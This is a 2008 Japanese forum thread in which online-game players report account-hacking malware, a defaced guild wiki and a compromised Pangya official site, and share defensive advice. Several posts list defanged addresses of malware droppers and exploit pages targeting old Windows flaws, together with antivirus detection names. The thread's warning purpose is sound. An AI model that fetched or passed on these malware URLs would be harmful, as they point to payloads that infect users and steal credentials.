安心したい場合は >>1-5 にもあるようにOSの再インストール推奨。
これ以上ウイルス感染していないと判断ができる、
削除されたので問題ないと思うなら、そのまま使用ということになります。 <> （○口○*）さん<>sage<>08/07/04 03:45 ID:z3DL5to50<> htaccess に

deny from .163data.com.cn
deny from .cn.cndata.com
deny from .cn

と書いてるにも関わらず

61■206■185■61■broad■xa■sn■dynamic■163data■com■cn
からアクセスがあったが、串使ってるんだろうか……

そしてブラウザ情報が
"Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9) Gecko/2008052906 Firefox/3.0"

このアクセスが中華のハク犯のものだとしたら、htaccessの設定を
１から見直した方がよさそうな気配…… <> 189<><>08/07/04 04:02 ID:OrAw1m2L0<> >>191
誤検出という場合もあるんですねorz

再度ノートンを更新してシステムスキャンしてみたら、今度は何も検出されませんでした。
実はリカバリした直後でして、新たになんだかんだインストールしたのは確かなのです；
誤検出なのかなぁ・・。　取り敢えずこのままいってみます。　ありがとうでした。 <> （○口○*）さん<><>08/07/04 05:32 ID:1YIm9uFEO<> あ <> （○口○*）さん<>sage<>08/07/04 06:41 ID:E2g8XhA10<> >>192
deny と allow の順番とか、鯖でホストを逆引きするかどうかの設定とか、
そういうのは全部クリアしてるんだよね？ <> （○口○*）さん<>sage<>08/07/04 08:51 ID:RhoPfk0q0<> 負荷問題からIP記述でしか機能しない（させてない）鯖もあるよねぇ <> （○口○*）さん<>sage<>08/07/04 09:10 ID:R2255C//0<> >>192
ホスト名で弾くならスクリプト内処理のがいいよ。 <> （○口○*）さん<><>08/07/04 12:29 ID:lYUb4wOW0<> 警察に放置され続けて電話したら
相手が特定できなくて捜査は終った。担当が帰ってきたら掛けなおさせる
と言われたのですがこの先復旧にこぎつけることは出来るのでしょうか・・
前回も不正アクセスがあったことだけでも証明して欲しいことを伝えたら
調査しないとわからないけど難しいねえ・・と言われたのですが・・ <> （○口○*）さん<>sage<>08/07/04 12:48 ID:ycqmywuj0<> 退いたら負け <> （○口○*）さん<>sage<>08/07/04 13:10 ID:R2255C//0<> 最後まで貫き通す意志がなければ負け犬…じゃなかった泣き寝入り <> （○口○*）さん<>sage<>08/07/04 13:25 ID:o3NhEPHS0<> RO卒業おめでとうございます。 <> （○口○*）さん<>sage<>08/07/04 15:44 ID:CPKTAaDe0<> >>192
ファイル名を間違えてないですか？
「.htaccess」と最初にドットが無いと機能しないし、
「.htaccess」自体が使えない鯖もあるのでご注意ください

未実装情報Wikiにある.htaccessのサンプル
ttp://future.sgv417.jp/download/conf/htaccess.txt <> （○口○*）さん<>sage<>08/07/04 16:08 ID:uPebc1qO0<> >>190
盗聴だけの話ならそうなんだけど。

＞2005年には不正アクセス事件の犯人が他人の無線LANを無断で
＞使用していたという事例や、2008年6月には他人の無線LANを
＞無断で使用してインターネットの掲示板に脅迫文書を書き込んだ
＞高校生が書類送検された事件などが発生している

つまり回線ただ乗りが問題で、なにがぶら下がってるかは関係ない。
PSPはWPA-PSKに対応してるからWEP使わなければいい話なんだけどね。

ところでNDSなんかでどうしてもWEPがいる場合なんかでも
SSID変更＋ステルスにすれば、解決ではないにせよずいぶん
マシになりそうな気がする。 <> 192<>sage<>08/07/04 17:00 ID:z3DL5to50<> 鯖はxrea。

.htaccessに自分のホスト名を同じように書き込んだら 403 で
閲覧不可になった（アクセスログも403）ので、正常動作は
してると思う。

一応 61.185.0.0/16 も deny 設定して様子見中。 <> （○口○*）さん<>sage<>08/07/04 17:17 ID:oD6xMf8n0<> > 61■206■185■61■broad■xa■sn■dynamic■163data■com■cn

逆引きのみで正引きの設定がされてないせい。
IPアドレスで弾くしかない。 <> （○口○*）さん<>sage<>08/07/04 17:25 ID:R2255C//0<> >一応 61.185.0.0/16 も deny 設定して様子見中。
その辺まで分かっているなら、IPアドレスをブロック単位で
加えていった方がいいかもね。 <> 192<>sage<>08/07/04 22:04 ID:z3DL5to50<> あー、そういう事だったのか
全く気付いてなかった……

whois見たら、この7/11で切れるみたいだ>163data

>Whois Record
>Domain Name: 163data■com■cn
>ROID: 20070711s10011s23187457-cn
>Domain Status: inactive
>Registrant Organization: 北京三方??网?技?有限公司
>Administrative Email:
>Sponsoring Registrar: 北京中科三方网?技?有限公司
>Registration Date: 2007-07-11 17:04
>Expiration Date: 2008-07-11 17:04 <> （○口○*）さん<>sage<>08/07/05 04:24 ID:sbJaxucw0<> >>198
相手を特定するのはまず無理なので
198がアクセスしていない場所や時間から
アクセスがあったことがはっきりすればいいだけだよね
警察がガンホーと連絡を取っているかが問題なんじゃ？
アカハックの復旧の流れとかもう一回チェックしたほうがいいよ <> （○口○*）さん<>sage<>08/07/05 17:59 ID:K+teZp2M0<> ｗｉｋｉを見ているとかカスペルスキーがこのアドレスはトロイの木馬を含みますと
警告してきました。　許可する　拒否するの選択肢がありましたがサイトに繋ぐことを拒否するのか、
サイトを表示させないことを許可するのか　よくわからず拒否するを選びました。
ウイルスソフトに対する知識があまりないのでこの選択は正しかったのか不安です。
もし間違っていたとしたら、どのような対策をとったらよいでしょうか。 <> （○口○*）さん<>sage<>08/07/05 18:15 ID:zqAMkE3m0<> >>209
選んだ選択としては正しい。
許可というのはセーフティロックを解除するようなもので
選ぶのは「それは誤判定だ」と言い切れるようなときのみ。
自分の判断だけで許可をする状況はまずないと思っていいよ。

ところで「wiki」って具体的にはどのサイト？ <> ２０９です<>sage<>08/07/05 18:57 ID:K+teZp2M0<> そうでしたか。よかったです。返信ありがとうございました。
ｗｉｋｉはラグナロク通り→ＧＶＧ→ｓｕｒｔ　ｗｉｋｉ→ｇｖｇギルド詳細→一番上の同盟のところをクリックしたら警告が出ました。
確か　ほかの同盟のところでも出たと思います。 <> （○口○*）さん<>sage<>08/07/05 20:58 ID:QS64Sged0<> >>211
覗いて見ましたが、こりゃ酷い。Wiki中の外部リンクがあちこち書き換えられている。
しかもタイムスタンプ変更しないという機能がONなのか "Last-modified: 2008-03-25 (火) 01:00:00 (102d)"
とかだからもしかするとすっごい前からこうなのかも。
多少ならリバートしようかと思ったけど、これじゃ洒落にならぬ。管理人さんがROから離れてなんとやらとか有りますが
管理人権限を発揮して何とかするしかないと思うなぁ。 <> （○口○*）さん<>sage<>08/07/05 21:02 ID:UMDlS9us0<> >>211
命拾いしたねｗ <> ２０９です<>sage<>08/07/05 23:28 ID:/aStHOh90<> そんなに酷くなっていたのですか・・
皆さんも気をつけてください。 <> （○口○*）さん<>sage<>08/07/06 00:18 ID:Qc2+AGoD0<> 横の連繋が取れている職Wikiはともかく、GvGWikiはLydiaとOdin以外は避けた方が無難。
この2つも、連絡会所属ということでの担保だけだし。
共通InterWikiNameから鯖Wiki関連がばっさり切り捨てられたことからも、このあたりは自明かと。 <> （○口○*）さん<>sage<>08/07/06 00:37 ID:4FVXufUE0<> 攻城戦Wikiは、放置・荒れ放題のところが多いですよね…。

きっちり閉鎖宣言して閉じられたところは、ごくまれ… <> （○口○*）さん<>sage<>08/07/06 01:44 ID:GiUvFO+60<> >>215
Lidiaは未実装の人がやってるから問題ないと思う

Odinはゆる～りだがGv板が(管理の面で)生きてるし管理はされてる方だと思う <> （○口○*）さん<>sage<>08/07/06 01:45 ID:GiUvFO+60<> スペルミスった。orz <> （○口○*）さん<>sage<>08/07/06 06:04 ID:ezYvKDcu0<> surt wikiに仕掛けられてたアドレス

www■skywebsv■com/Blog/
www■teamerblog■com/blog/
www■gamehanbook■com/esports
www■articlelin■com/wiki/
IPだと 61■139■126■91 や 61■139■126■16

他にもあったのかもしれないけど、改竄っぷりが凄すぎて見る気が失せた。
正直、全ページデリった方がいいような気がする。

仕掛けられてたものはFlashの脆弱性やReal Playerの脆弱性、定番のMs06014 とか。
iframeの罠検出を避けるためか、フレームサイズを width=90 height=0 みたいに弄ってる。
毎度のCuteQQ謹製ツールで作られたものっぽい。

Psymeらしいので発動しないとは思うけど、 0733■htm が VT で 5/33 、カスペも素通り。

Flashの罠の huohu5798592■swf はカスペによるとExploit.SWF.Downloader.a。
第一号を見るとは思わなかった。 <> （○口○*）さん<>sage<>08/07/06 09:45 ID:bOwSFTSo0<> >>219
ついでに言うと”GvG詳細”の添付ファイルにはウィルス実行ファイルを置いてるな。

添付ファイルの実行ファイルをLinuxからClamAVでスキャン。
NLK■FC■exe: Trojan.Inject-347 FOUND

>正直、全ページデリった方がいいような気がする。
WikiのTOP見てもゲームから離れたを理由に管理者自ら管理放棄状態と思われるしねぇ。
この手のWikiにありがちな、俺が管理放棄しても利用者が何とかしてくれるしいいや的な利用者まかせともとれる。

リネ資料室の管理者さんは言っていた、管理できなくなったら放置せず中身もきれいさっぱり削除して完全に閉鎖、管理者としての責任であると。 <> （○口○*）さん<>sage<>08/07/06 10:15 ID:N7fYAo+u0<> もうページ消しちゃったら？
有志が新wiki立てることになればデリった差分から復元できることだし。 <> （○口○*）さん<>sage<>08/07/06 11:36 ID:FugAEIi60<> 【　　　気付いた日時　　　　　】昨晩と今（URLを記入しようとして誤って踏んでしまいました）
【不審なアドレスのクリックの有無　】 www■jplineagejp■com■wiki/ 　2chのスレから踏みました
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 Yes たまに家族が使う程度
【　　ツールの使用の有無　　　】？
【　ネットカフェの利用の有無　　　】 Yes
【　　　 OS　　】 Win XP Home SP2
【使用ブラウザ】 Sleipnir2.62 IEは6
【WindowsUpdateの有無】自動更新6月20日
【　アンチウイルスソフト】 F-SecureInternetSecurity2008
【その他のSecurty対策】ルータ、Spybotでたまにスキャン
【ウイルススキャン結果】検出なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】？
【PeerGuardian2導入】無

【説明】ネトゲはやっていませんがこちらで知恵をお借りしたく失礼します。
別のウィルス情報質問スレで質問したのですが、レスがつかないため
アカウントハックにより詳しいこちらで知恵を貸して頂けたらと思います。
アカウントハックはゲーム以外のID PASSも変更が必要なのでしょうか。

URLを踏んだらセキュリティソフトでTrojan-Downloader.VBS.Psyme.fb が検出されました。
検疫ができず名前変更処理済で、サポート側からも名前変更処理してあるので大丈夫と回答頂きましたが心配です。
過去スレでWindows Updateをしてあれば大丈夫と見たのですが、自分の履歴では該当のMS06-014を当てた形跡が無くちゃんと当たってるかも心配です。
このパッチが出た後に買ったパソコンで適用されているのかわかりません。

今誤って同じURLを踏んでまた感染してしまい、履歴はTrojan-Downloader.VBS.Psyme.fbとなっていますが
感染メッセージにはPsyme.odとか書いてあった気がします。 <> （○口○*）さん<>sage<>08/07/06 11:51 ID:ZnCvYEdM0<> >アカウントハックはゲーム以外のID PASSも変更が必要なのでしょうか。
mixiなどとの複合型もあるので、発動させた後IDとPASSを入力しているものは
安全な環境から一通り変更するのが望ましい。

>今誤って同じURLを踏んでまた感染してしまい、履歴はTrojan-Downloader.VBS.Psyme.fbとなっていますが
>感染メッセージにはPsyme.odとか書いてあった気がします。
同じアドレスに複数の検体が入っている事や、差し替えが行われており前回と違う名称であることはよくある。 <> （○口○*）さん<>sage<>08/07/06 13:21 ID:31pfsqYN0<> まだハックかどうかもわからないのですが…。
ROのクライアントを立ち上げ、ゲーム起動をクリックしたら
ブラウザ（Sleipnir）が立ち上がり、一気に30くらいのタブが出てきました。
怖くなりブラウザは即終了したので何を読み込んだのかわかりません。
今再起動しもう一度ROを立ち上げると今度は何も出てきませんでした。
発生するまでいろいろなページを見たので詳細は覚えていませんが、ウィルスソフトは
特に何も検知しませんでした。

とりあえず、ROの方はPASS等は入力せずに終了させましたが、
これはアカハックなのでしょうか？
過去にこんな事例はありましたか？
教えてください。 <> （○口○*）さん<>sage<>08/07/06 13:23 ID:ezYvKDcu0<> >221
Wiki使ってるスレがあるなら、そこに一声掛けてからの方がいいと思って
探したが、どこがそうなのか良く分からんかった

>222
www■jplineagejp■com/wiki/
--->www■jplineagejp■com/wiki/jpmm■exe

index.html は VTで25/33、TrendMicroがスルー。
jpmm は VTで27/33、McAfee・NOD32v2・Symantecがスルー。
結果として、普通のアンチウィルスソフトならどちらかを引っかける。

MS06-014 は Microsoftが 2006年に出したWindowsUpdateのパッチの14番目のもので
MDACの脆弱性の修正パッチ。

>【WindowsUpdateの有無】自動更新6月20日
とあるので、当たってると思われる。
XPのSP3にも含まれてるので、それを当てるって手もある。

罠は結構頻繁に差し替えられてるため、ある時はRO限定であっても、ある時はmixiや
メッセンジャーのPASS抜きも合わさってたりする。
なので>223の言うように、”安全な環境”から、一通り変更した方が無難。 <> （○口○*）さん<>sage<>08/07/06 14:12 ID:pLlWsFFE0<> >>224
そんな何が起動したか分からない、再現もしない、原因もどれか知らないなんて、
雲をつかむような話をされる身にもなってみろ。 <> （○口○*）さん<>sage<>08/07/06 14:26 ID:GiUvFO+60<> >>224

・ウイルスソフトは何を使っている？
　ノートンはアカウントハックウイルスの検知率低いので
　カスペルスキーのオンラインスキャンを試してみるといいかもしれない

ＲＯに反応してるってことなら怪しいのでクリーンインストールがいいんだが。 <> （○口○*）さん<>sage<>08/07/06 14:26 ID:ZnCvYEdM0<> 新規に立てられたスレ。もろにアカハックのアドレス。

1 （○口○*）さん 08/07/06 13:36 ID:MmFQw6bL0
ある日の臨時です、メンバーの同意が得られたのでうｐ。ぼうれい武者がガイコツまおうとノロージョを退...

http://www■makgcat■com/rm■exe <> 224<>sage<>08/07/06 15:50 ID:31pfsqYN0<> >>227
ウィルスソフトはウィルスキラーを使用。
とりあえずカスペでスキャンしてみます。
ありがとう。

>>226
確かにこんな報告じゃ助言も出来ないですね。
当時焦ってしまって訳わからなくなってしまったのが駄目なところでした。
大変申し訳ない。 <> （○口○*）さん<>sage<>08/07/06 16:06 ID:ZnCvYEdM0<> >ウィルスソフトはウィルスキラーを使用。
検索エンジンは、Rising らしいな。

取り敢えず>>224の症状は、ウイルスというよりブラクラを踏んだ時の症状だな。
特定のページを開こうとする奴の誤動作の可能性もあるけど。 <> （○口○*）さん<>sage<>08/07/06 17:27 ID:ezYvKDcu0<> >228
rm■exe　Trojan-PSW.Win32.Mapler.ae
VTが落ちてるのか繋がらなかったので、カスペの結果のみ <> （○口○*）さん<>sage<>08/07/06 18:00 ID:bOwSFTSo0<> >>228
makgcatは今月末で期限切れだから福建人一味も頑張っている模様。 <> 222<>sage<>08/07/06 18:11 ID:qN3XBpTPO<> >>223,225
ありがとうございます。
安全な環境からPASSを変更するのが無難という事は
現在のPCはリカバリーするのが前提でしょうか。
バックアップを取る場所がなかったりすぐ出来そうにないので
大丈夫ならこのまま使おうと甘く考えてました。
仕方なく現在のPCでちょっとだけネットも接続しましたが怖くてログインするサイトは行ってません。

以下チラ裏ですが買った時の説明書やＣＤ類(DELLなので少しです)を探したら見つからず…最低です。 <> （○口○*）さん<>sage<>08/07/06 18:25 ID:bOwSFTSo0<> surt wikiの改竄部分の確認できたページのリンクの除去だけしてきた。
見落としあると思うけどね。 <> （○口○*）さん<>sage<>08/07/06 18:37 ID:g7zWwvcY0<> >>231
ttp://www.virustotal.com/analisis/bc868aef092d444cf750a5c958c6b6b0
スルー Norton NOD32

踏んでドロッパがトロイをドロップした後(感染後に検出・駆除できるか? というもの)
ttp://www.virustotal.com/analisis/2906f37a344e746ab9e7e2c29eaccd43
スルー AVG McAfee Norton NOD32

物としてはRO、FFXI、mixiの複合アカハック。 <> （○口○*）さん<>sage<>08/07/06 23:38 ID:ezYvKDcu0<> >234
httpで検索して、明らかに怪しいリンクは消してきた。
更新の衝突があったので、他にもメンテしてる人が居た模様。

しかし中に 23style があったんだが、一体いつから改竄されてたんだ？
ToIndex となってる部分にリンク仕込むとか、芸が細かすぎる…… <> （○口○*）さん<>sage<>08/07/07 02:00 ID:NJ9tRs7P0<> >>234
Surt wikiの設置してあるGamedbの場合、標準でNGワードの設定機能があるんだよね。
ttp://gamedb.info/faq.html#faq17
無論、この項目の編集にはWiki管理者パスワードが必要。

TOPの記述を見ても、後継管理人の募集や、別サイトへの引き継ぎなどの対策も行わずにフェードアウトしたのに近いから、
あまり期待が出来ないのが実状だろう。そのタイムスタンプすら、2007-03-19時点のまま追記が無いし。

検索などで辿り着くなど被害が増える要因は幾らでもあるし、ぼろぼろの攻城戦Wikiは放棄して、GvG集約Wikiを再構築した方が
良いのではないだろうか。
トラフィック問題なども、最盛期と比べたら格段に減少しているので、複数鯖の分を纏めても耐えられるのではなかろうか。
各方面からの被リンクなども新サイトに誘導すれば、検索結果も上位になることによって、旧サイトよりも優先順位が上まわる。 <> （○口○*）さん<>sage<>08/07/07 12:45 ID:E4iPWSqx0<> >>237
言い出しっぺの法則摘要に期待 <> （○口○*）さん<>sage<>08/07/07 20:14 ID:t9ZIwzug0<> www■1ive■net/i.exe
ttp://www.virustotal.com/analisis/39672b907b783b20dd78c9398b24ae7a
スルー avast McAfee NOD32 Norton バスター

んで踏むと↓をダウンロードして実行。
www■1ive■net/oo.exe
ttp://www.virustotal.com/analisis/e6a067ce6983c1dc74c0bf26c43ea9ed
スルー McAfee Norton OneCare バスター

提出します。 <> （○口○*）さん<>sage<>08/07/08 00:00 ID:7KfWKSc70<> パンヤ公式がハッキングされウイルスを仕込まれた様子
現在は駆除されてるけど具体的なことがさっぱり公開されてない <> （○口○*）さん<>sage<>08/07/08 00:44 ID:mGb+BUjO0<> これか。3日も放置してたのか?

パンヤ
公式サイト緊急メンテナンスの経緯について
ttp://www.pangya.jp/board_notice_view.aspx?seq=1571
7月5日（土）20:30頃より、公式サイトにて一部のページが改ざんされ、
該当ページを閲覧した場合に、悪意のあるサイトへの誘導、
ウィルスに感染する恐れがございました。
そのため、7月7日（月）10:30より公式サイトの緊急メンテナンスを実施し、
改ざん部分の復元および、該当箇所の脆弱性を修正いたしました。 <> （○口○*）さん<>age<>08/07/08 05:19 ID:VC3aM1kf0<> トロイ：Trojan-Downloader.JS.Agent.ccv
パンヤの公式掲示板見る限り、
ピピン占いのページが改ざんされて、インターネット一時ファイルに上記のウィルスが感染。
で、カスペ以外のウィルス対策ソフトは完璧スルーだったらしい。占いやった人要注意。
ちょっとageておこう。 <> （○口○*）さん<>sage<>08/07/08 05:26 ID:VC3aM1kf0<> ああごめん、ノートンとかでも検出できたらしい。
バスターはダメだったとか・・・ <> （○口○*）さん<>sage<>08/07/08 05:40 ID:mGb+BUjO0<> >>242
公式BBS見てきた。
asslad■com allocbn■mobi
adw95系のボットネットですねぇ。
インチキセキュリティソフトを突っ込むやつ。
最近PlayStation(北米)のサイトもやられた。 <> （○口○*）さん<>sage<>08/07/08 05:44 ID:zR5CmjSs0<> >>241の飛ばされ先。
-> www■allocbn■mobi/ngg■js
--> appdad■com/cgi-bin/index■cgi?ad
後者のアドレスは、短時間に同一RemoteHost?からのアクセスがあった場合に、msn.comにリダイレクトする模様。 <> （○口○*）さん<>sage<>08/07/08 06:10 ID:mGb+BUjO0<> >>245
そこは…面倒です。
単純に書くとドメインaaaとドメインbbbがあった場合、
aaa
→aaa
aaa
→bbb
bbb
→aaa
bbb
→bbb
と全部組み合わせが可能です(飛び先はたぶん5分くらいで切り替わる)。
で、ドメインがほぼ毎日いくつも取得されていたりします
(常時稼動しているのは1ダース程度かと)。
ドメインでググるとぐんにょりします。 <> （○口○*）さん<>sage<>08/07/08 09:17 ID:BZTh1Am10<> バスターはノートンと張り合っているかと思ったら、落ち目になってるねぇ。 <> （○口○*）さん<>sage<>08/07/08 09:50 ID:exwe+cFa0<> FFがすごい勢いでやられています
感染源はここ↓の広告枠の可能性が高いようです（今は広告消えているようですが）
www●ffxiah●com/index●php
現時点ではカスペすり抜けている＆検体捕獲できていない模様
FFもやっている人は気をつけてください

（FFXI）●RMT業者による不正アクセスの報告・対策ｽﾚｯﾄﾞ26●
ttp://changi.2ch.net/test/read.cgi/ogame/1215465339/l50 <> （○口○*）さん<>sage<>08/07/08 12:09 ID:BZTh1Am10<> 「マルウェア検体、改ざん報告求む」JPCERT/CCが情報連携訴え
http://internet.watch.impress.co.jp/cda/news/2008/07/07/20173.html <> （○口○*）さん<>sage<>08/07/08 16:54 ID:shIC6GriO<> 一応ノートンだけど、ピピン占いした時に【外部からの攻撃をブロックしました】と出た確かに！

その後カスペオンラインｽｷｬﾝしたら感染してなかったから大丈夫とみていいのかな？

パンヤひどいよ(´･ω･`) <> （○口○*）さん<>sage<>08/07/08 16:58 ID:flq/uzz30<> 「スカっとゴルフパンヤ」で公式サイト改竄，利用者はウイルスチェックを
ttp://www.4gamer.net/games/014/G001477/20080708009/
とうとう利用者多めのとこがやられたか……FEZとか大丈夫か
我らが癌も対岸の火事じゃないぞ <> （○口○*）さん<>sage<>08/07/08 17:05 ID:In7T+b2oO<> 公式までやられると、もう自衛意識だのなんだのじゃ済まないよなあ。

うちはずーっとバスターで通してたけど、そろそろカスペ様にでも乗り換えるかねえ… <> （○口○*）さん<><>08/07/08 17:13 ID:shIC6GriO<> 公式さえやられる時代とは(ノд<。)゜。

もうRO専用マシーンにするよ <> （○口○*）さん<>sage<>08/07/08 17:21 ID:gegUJY8j0<> 【癌呆】＜そこは我々が５年前にねちねちごろごろ通った道だ！ <> （○口○*）さん<>sage<>08/07/08 17:22 ID:BZTh1Am10<> よく見てないけれど、パンヤもSQLインジェクション攻撃なのかな。

サイト運営側（というか制作側）から見てもかなり頭の痛い問題だと思うので、
気をつけておかないとねー。 <> （○口○*）さん<>sage<>08/07/08 18:41 ID:mGb+BUjO0<> >>255
そう。世界中で大暴れしているボットネットです。 <> （○口○*）さん<>sage<>08/07/08 18:45 ID:7KfWKSc70<> 事前に防ぐのは難しいと思うから、事後のことは本当にしっかりしてもらいたいね <> （○口○*）さん<>sage<>08/07/08 19:02 ID:ssHdwhtR0<> ボットネットに関しては一応こんなものもある
ttps://www.ccc.go.jp/index.html

トレンドマイクロなのが微妙だけどｗ <> （○口○*）さん<>sage<>08/07/08 20:50 ID:mGb+BUjO0<> >>258
あー、それはだめだわｗ <> （○口○*）さん<>sage<>08/07/08 20:50 ID:7KfWKSc70<> パンヤ公式BBSの書き込みみると今までターゲットにされてなかっただけに
認識の甘さが凄すぎる…、本格的に狙われたら相当被害でそう <> （○口○*）さん<>sage<>08/07/08 21:08 ID:PkZ0ooP00<> SQLインジェクションによるサイト改竄の話はよく聞くが
どのサイトでも起こりうるもになの？

ぶっちゃけて聞けば、各種職Wikiやファンサイト、個人の
Blogでも改竄されるもの？ <> （○口○*）さん<>sage<>08/07/08 21:17 ID:k2rn10bP0<> >>261
SQLインジェクションをすごく簡単に言えば、
ブラウザから（Web鯖上の）スクリプトに渡した文字列データを「そのまま」
データベースに送るような処理があるとアウト。

通常ではありえないような入力が無いかチェックして、きちんと弾いて
やらなければならない。それも全般にわたって。 <> （○口○*）さん<>sage<>08/07/08 21:31 ID:PkZ0ooP00<> ということは、外見上入力フォームがあるサイトは起こりうると
思ってた方がいいのかな <> （○口○*）さん<>sage<>08/07/08 21:51 ID:y4/JuezT0<> 今夜アルケミテンプレを見ていた人は注意されたし
垢ハクの書き換えがあった模様

http://gemma.mmobbs.com/test/read.cgi/ragnarok/1213269500/620 <> （○口○*）さん<>sage<>08/07/08 22:12 ID:42Fn2kOY0<> >>263
それは半分は正解。
SQLインジェクションという攻撃手法はSQL言語を利用したプログラムをターゲットとする。
例えばSQLサーバ（例えばMySQL）を利用したCGI(例えばMovableTypeとかWordpress、MediaWiki)
とかね。

で、職Wiki等で用いられているPukiwikiはSQLサーバを使用してない。データはファイルに
保存される。だからそれらは基本的にSQLインジェクションには関係が無い。
但し、CGI自体に脆弱性が有り、フォームからの不正な入力をきちんと弾けてない場合は
同じく悪さをされる可能性がありうる。こっちは昔っから言われているせいか最近では
あまり聞かないなぁ(フォームメールの脆弱性はよく有るけど)。SQLインジェクションは
それと比べて近年注目されだしたからまだ対策の甘いとこがゴマンと有るんだろうね。 <> （○口○*）さん<>sage<>08/07/08 22:18 ID:k2rn10bP0<> Webサーバで使われるapacheもそうだし、
クライアントで使われるFlash Playerやその他のソフトウェアもそうだし、
もっと言ってしまえばOSもそうなんだけれど、

広く普及しているモノは狙われやすい。
セキュリティホールが見つかったとき、効果的なアタックが可能だしね。

ウイルスも昔は見た目に分かる影響を出すモノが多かった（HDD壊す
だとかパケット出しまくるだとか）、今はこっそり活動することに重きが
置かれているので、検出されない亜種が放置されることもあって危ない。 <> （○口○*）さん<>sage<>08/07/08 22:58 ID:QEmKKKk00<> 検出されずにひっそりと活動を続けてるウィルスが、多くの人のPCに潜んでたりしそうだな。 <> （○口○*）さん<>sage<>08/07/08 23:37 ID:zR5CmjSs0<> >>261
極端な話をすれば、癌公式もやられる可能性は0ではない。
いま現在、各種告知などに使われているのはNucleus CMSで、このソフト自体がSQLデーモンを前提としている。
また、XSS脆弱性をfixする為のアップデートも何度となくリリースされたので、それらを適用していないと問題となる。
本当は、具体的な使用ソフト名を出すのはリスクかも知れないが、公式の場合は公然とエラーメッセージをリモートに吐くので
こんなところで書いたところで影響は軽微だろう。

>>265
最近あった例だと、クエストWiki絡みでparaedit.ini.phpにサニタイズ抜けが指摘されていたような。
Wikiクローン本体だけでなく、導入したpluginに穴がある場合もあるから厄介。 <> （○口○*）さん<><>08/07/09 05:41 ID:+Oi2BnO1O<> 友達にアカハックされているかもよと言われて、このままで待っててね
色々教えるからと言われて待つこと4時間。眠くて大変なのですが、スレなど読んで親のパソコンからパスワードは変えました。
友達は上がってきません。学校行く準備しないといけないのですが
落ちて大丈夫ですか？
帰ってきたら、ウィルスチェックしたらいいですか？
それともパソコンはつけっぱなしでないとだめですか？
今日はバトンが頭に落ちてきそう(;_;) <> （○口○*）さん<>sage<>08/07/09 05:53 ID:eDvbD/uC0<> 別PCからパスかえたんなら　とりあえずはOKかな？
完全にOKとはいえないのでその辺は運だな後は今できることは無いと思う
親のPCはウィルスチェックした？

たぶん友達は難しいこと考えて寝ちゃったんだと思うｗｗｗｗ
そもそも　アカハックされてるかもよ　じゃなくて
ウィルス踏んでるかもよ？なんじゃないかと
カスペルスキーでチェックかけてみそ？ <> （○口○*）さん<>sage<>08/07/09 06:04 ID:BmbQ1DIA0<> 以前の鍵は盗まれたかもしれなくても、新しい鍵に付け替えられたのならとりあえずは大丈夫
帰ってきてからゆっくり対応すればいい
PCを付けっぱなしにする必要はない
ログインしっぱなしにする必要もない

しかし感染の疑われるPCでは対処が終わるまでPass打ち込み(ログイン行為)は出来ないので、
もし今ログインさせたままであるというなら、やっておかなければいけない事があれば済ませておく事
まあゲーム内でのことなんて優先度は低いが <> （○口○*）さん<><>08/07/09 06:08 ID:+Oi2BnO1O<> お返事ありがとうございます。
心配で眠れませんでした。たまり場で一人でポツンって
していたら悲しくなってしまいました。初めてこのスレを見つけた時は
泣いてしまいました。
親のパソコンはウィルスチェックしませんでした(;_;)
かすぺ？みたいなのをする時間は今はありません。
親に怒られるかもしれませんが
ログアウとしない方が良いですか？ <> （○口○*）さん<><>08/07/09 06:12 ID:+Oi2BnO1O<> またお返事ありがとうございます。
パソコン落として部活に行きます。
怪我しないようにしないと。
また帰ってきたらスレをよくよんでみますね
貴重なアドバイスありがとうございました <> （○口○*）さん<><>08/07/09 06:33 ID:T22QPkcw0<> 月例WUage

重要(4)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-jul.mspx <> （○口○*）さん<>sage<>08/07/09 08:14 ID:3fTT1tOw0<> KB951748適用すると、ZoneAlarm使用人はネットに繋がらなくなる恐れあり
ZoneAlarm側でまだ対策upされてないのでアップデートは自己責任で <> （○口○*）さん<>sage<>08/07/09 09:05 ID:VP51IgiY0<> いつか分からないけれどJavaもあぷでとしてる <> （○口○*）さん<>sage<>08/07/09 09:09 ID:5cPr6K1D0<> 福建中華どもはドメイン取得からサイト改竄へシフトしつつあるのか、
ある掲示板でこんな書き込みを見つけた。
-----ここから
900．Lineage EP6&EPU Database 返信引用

名前：ウルフィナ日付：7月7日(月) 0時13分
本家サイトのwiki記事です。
更新内容についての説明を書いたのでご覧ください。
hxxp://kanauni.blog.shinobi.jp/

899．～企画・主催～返信引用

名前：ソウム日付：7月7日(月) 0時5分
リネ１のアンソロジー同人誌企画。　
現在執筆者様募集中です！
hxxp://kanauni.blog.shinobi.jp/
-----ここまで

このテンプレ記事で、以前からウィルス爆撃をしている。
ちなみにURLは出版社のブログらしい、いわゆる罠ブログではないことを確認。

このことから、パンヤ改竄とほぼ同時期に改竄されていた可能性がある。
8日時点ではソースチェッカーでも手も怪しい部分は見つけられず、直っている模様である。

そろそろ忍者ブログも危なそうだ、ここのブログ持ちは一度パス変更(設定可能な最大文字数で)をしたほうがいいかも。
気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/09 09:11 ID:9t5aqmPp0<> 出来れば.も変換して置いてくれた方がよかった <> （○口○*）さん<>sage<>08/07/09 09:26 ID:9wCrbn7l0<> >>277
iframe
www■infosueek■com/ff11diary
ソースチェッカーでも7日のキャッシュで出るぞ。 <> （○口○*）さん<>sage<>08/07/09 09:52 ID:VP51IgiY0<> XSSも頭の痛い問題だな。
これを全部弾くと、まず、広告が死ぬし。 <> （○口○*）さん<>sage<>08/07/09 10:31 ID:cEKOiPhL0<> おまえさんがた今日はWindowsUpdateの日ですよ
今月は４件 <> （○口○*）さん<>sage<>08/07/09 10:36 ID:VP51IgiY0<> >>281
>>274 <> （○口○*）さん<>sage<>08/07/09 10:45 ID:kq3y3zOY0<> そこ今もそのコードが埋め込まれてる様に見えるが……
再度埋め込まれたのか、キャッシュの関係で一時的に見えなかったのかは分からんが
今現在、infosueekのiframeがあるぞ

今検体チェック出来る環境じゃないので、見える範囲だけだと
www■infosueek■com/xin/Ms06014tt■htm
www■infosueek■com/xin/Ms06046tt■htm
www■infosueek■com/xin/Yahoott■htm
www■infosueek■com/xin/Ms07004tt■js
定番のMS06014、MS06046(US ASCII)に加えてMS07004(VMLの脆弱性)
